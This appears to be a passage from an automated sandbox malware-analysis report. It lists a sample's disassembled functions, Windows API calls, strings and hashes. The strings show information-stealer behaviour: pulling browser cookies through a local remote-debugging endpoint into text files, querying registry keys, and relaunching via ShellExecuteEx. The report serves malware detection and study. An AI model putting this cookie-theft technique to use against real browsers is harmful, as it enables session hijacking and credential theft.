                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID:
                            • API String ID: 2762123234-0
                            • Opcode ID: 3bd7b8b5ae183815e382a722f11d69096af09d4b0fcf996b9c3f9e0a21d3a36b
                            • Instruction ID: 4efff4c2a3c8bf74ffb9ae5763207e5406d3ae8c4c80017f6a121a698c13a845
                            • Opcode Fuzzy Hash: 3bd7b8b5ae183815e382a722f11d69096af09d4b0fcf996b9c3f9e0a21d3a36b
                            • Instruction Fuzzy Hash: B1B1CC30910636EBCB22EFA8EC49BAFB7B9AF14305F440525F841A7A64DB30DD11CB91
                            Function 001419F0 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00141A1F
                            • lstrlen.KERNEL32(013E61B0), ref: 00141A30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141A57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141A62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141A91
                            • lstrlen.KERNEL32(00154FA4), ref: 00141AA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141AC4
                            • lstrcat.KERNEL32(00000000,00154FA4), ref: 00141AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141AFF
                            • lstrlen.KERNEL32(013E5FF0), ref: 00141B15
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141B3C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141B47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141B76
                            • lstrlen.KERNEL32(00154FA4), ref: 00141B88
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141BA9
                            • lstrcat.KERNEL32(00000000,00154FA4), ref: 00141BB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141BE4
                            • lstrlen.KERNEL32(013E6000), ref: 00141BFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141C21
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141C2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141C5B
                            • lstrlen.KERNEL32(013E6010), ref: 00141C71
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141C98
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141CA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141CD2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 39404de532ef3f41fe3d01db383d9210c6ef5ced4231c4f96032cea928bf7d7e
                            • Instruction ID: f25eca5e0db1cb9673f5ca94946b2db735f69d1832363a82f3a41caa64da6491
                            • Opcode Fuzzy Hash: 39404de532ef3f41fe3d01db383d9210c6ef5ced4231c4f96032cea928bf7d7e
                            • Instruction Fuzzy Hash: 1F914DB0601713EBDB21AFB5DC89A1AB7FCEF18305F145829E896D3661DB34D9818B60
                            Function 001348C0 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 001348F3
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00134925
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134972
                            • lstrlen.KERNEL32(00154B68), ref: 0013497D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013499A
                            • lstrcat.KERNEL32(00000000,00154B68), ref: 001349A6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001349CB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001349F8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134A03
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134A2A
                            • StrStrA.SHLWAPI(?,00000000), ref: 00134A3C
                            • lstrlen.KERNEL32(?), ref: 00134A50
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134A91
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B18
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B41
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B6A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B90
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134BBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: a6931e1e8e7b2ea481bf538cb9adf4899ac656396588e24a1f29694856f392a3
                            • Instruction ID: 1b35940a60bd1fe7dded4993fc5bd857babad59b652806e3372477452118a596
                            • Opcode Fuzzy Hash: a6931e1e8e7b2ea481bf538cb9adf4899ac656396588e24a1f29694856f392a3
                            • Instruction Fuzzy Hash: 0BB1B631A11326ABCF21EF78E846AAF77B9AF54304F041128FC46A7625DB30EC158BD0
                            Function 001292B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 001290C0: InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 001290DF
                              • Part of subcall function 001290C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 001290FC
                              • Part of subcall function 001290C0: InternetCloseHandle.WININET(00000000), ref: 00129109
                            • strlen.MSVCRT ref: 001292E1
                            • strlen.MSVCRT ref: 001292FA
                              • Part of subcall function 00128980: std::_Xinvalid_argument.LIBCPMT ref: 00128996
                            • strlen.MSVCRT ref: 00129399
                            • strlen.MSVCRT ref: 001293E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00129547
                            • lstrcat.KERNEL32(?,0015179C), ref: 00129559
                            • lstrcat.KERNEL32(?,?), ref: 0012956A
                            • lstrcat.KERNEL32(?,00154BA0), ref: 0012957C
                            • lstrcat.KERNEL32(?,?), ref: 0012958D
                            • lstrcat.KERNEL32(?,.txt), ref: 0012959F
                            • lstrlen.KERNEL32(?), ref: 001295B6
                            • lstrlen.KERNEL32(?), ref: 001295DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00129614
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: d3897db0745e77dec51903cdadfbd0475889115d05df6daed4e0c03c9a919e08
                            • Instruction ID: ebec02b37e3bb80623299e547e5891a9fe73a13f77158fd325fa1842316572a1
                            • Opcode Fuzzy Hash: d3897db0745e77dec51903cdadfbd0475889115d05df6daed4e0c03c9a919e08
                            • Instruction Fuzzy Hash: 85E14970E10228EFDF10DFA8E891ADDBBB5BF58301F1045A9E509A7281DB309E95CF90
                            Function 0013DB70 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0013DB91
                            • memset.MSVCRT ref: 0013DBA3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013DBCB
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013DBFE
                            • lstrcat.KERNEL32(?,00000000), ref: 0013DC0C
                            • lstrcat.KERNEL32(?,013FE400), ref: 0013DC26
                            • lstrcat.KERNEL32(?,?), ref: 0013DC3A
                            • lstrcat.KERNEL32(?,013FD328), ref: 0013DC4E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013DC7E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0013DC85
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013DCEE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 596463d260d7e1b384046494b05052786b5ae68517a52444bf37f96d6c4cc74f
                            • Instruction ID: 478840c746cc048735ba9e923546d1cd1fa594bd6142918785c74be1f2267b74
                            • Opcode Fuzzy Hash: 596463d260d7e1b384046494b05052786b5ae68517a52444bf37f96d6c4cc74f
                            • Instruction Fuzzy Hash: B5B19D71D10269AFCB11EFB4EC859EEBBB9FF58300F144969E906A7250DB309E54CB90
                            Function 0012B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B3D9
                            • lstrlen.KERNEL32(00154C54), ref: 0012B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B474
                            • lstrcat.KERNEL32(00000000,00154C54), ref: 0012B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B4A9
                            • lstrlen.KERNEL32(00000000), ref: 0012B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B587
                            • lstrlen.KERNEL32(00154ADC), ref: 0012B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B622
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 0012B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B65E
                            • lstrlen.KERNEL32(?), ref: 0012B767
                            • lstrlen.KERNEL32(?), ref: 0012B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B79E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: ab5d519073e67c61c8fd869b3a90e3ed9dde82b0363dcf223ba6972ebe204cfb
                            • Instruction ID: ff3c39c8d1030f84a446c4a860a163dec8ec64a06558bec156f8baa18f83d120
                            • Opcode Fuzzy Hash: ab5d519073e67c61c8fd869b3a90e3ed9dde82b0363dcf223ba6972ebe204cfb
                            • Instruction Fuzzy Hash: 17025F30A05626DFCB25DF64E9C9B6EB7F5BF44305F188069E8099B2A2D735DC52CB80
                            Function 00143930 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • RegOpenKeyExA.ADVAPI32(?,013FB120,00000000,00020019,?), ref: 0014398D
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 001439C7
                            • wsprintfA.USER32 ref: 001439F2
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00143A10
                            • RegCloseKey.ADVAPI32(?), ref: 00143A1E
                            • RegCloseKey.ADVAPI32(?), ref: 00143A28
                            • RegQueryValueExA.ADVAPI32(?,013FE0B8,00000000,000F003F,?,?), ref: 00143A71
                            • lstrlen.KERNEL32(?), ref: 00143A86
                            • RegQueryValueExA.ADVAPI32(?,013FE088,00000000,000F003F,?,00000400), ref: 00143AF7
                            • RegCloseKey.ADVAPI32(?), ref: 00143B42
                            • RegCloseKey.ADVAPI32(?), ref: 00143B59
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 62f6904c203745c3735bc6e5f834a94eb6f6b0170eb03bd53ef970448cea9cc2
                            • Instruction ID: aca315c993815bd59dde3634e08af15f8c6524d7080fc724e1ed165b943cdd6e
                            • Opcode Fuzzy Hash: 62f6904c203745c3735bc6e5f834a94eb6f6b0170eb03bd53ef970448cea9cc2
                            • Instruction Fuzzy Hash: B7919CB2900218DFCB10DFA4DC84AEEB7B9FB48315F148569E509BB261D731AE46CF90
                            Function 001290C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 001290DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 001290FC
                            • InternetCloseHandle.WININET(00000000), ref: 00129109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00129166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00129197
                            • InternetCloseHandle.WININET(00000000), ref: 001291A2
                            • InternetCloseHandle.WININET(00000000), ref: 001291A9
                            • strlen.MSVCRT ref: 001291BA
                            • strlen.MSVCRT ref: 001291ED
                            • strlen.MSVCRT ref: 0012922E
                            • strlen.MSVCRT ref: 0012924C
                              • Part of subcall function 00128980: std::_Xinvalid_argument.LIBCPMT ref: 00128996
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 75caabca301e78e28346ed22cc62832de8fda12fa0089076157846c4b87d283d
                            • Instruction ID: 032ffd99ee81433cf939835dd657fe6a254981e1510dac7efdbc8cc265b47263
                            • Opcode Fuzzy Hash: 75caabca301e78e28346ed22cc62832de8fda12fa0089076157846c4b87d283d
                            • Instruction Fuzzy Hash: E151E671A00205ABDB20DBA8EC45BEEF7F9DF48711F140169F904F7290DBB4DA8887A1
                            Function 00141830 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00141871
                            • lstrcpy.KERNEL32(00000000,013EB8A0), ref: 0014189C
                            • lstrlen.KERNEL32(?), ref: 001418A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001418C6
                            • lstrcat.KERNEL32(00000000,?), ref: 001418D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001418FA
                            • lstrlen.KERNEL32(013FA400), ref: 0014190F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00141932
                            • lstrcat.KERNEL32(00000000,013FA400), ref: 0014193A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141962
                            • ShellExecuteEx.SHELL32(?), ref: 0014199D
                            • ExitProcess.KERNEL32 ref: 001419D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
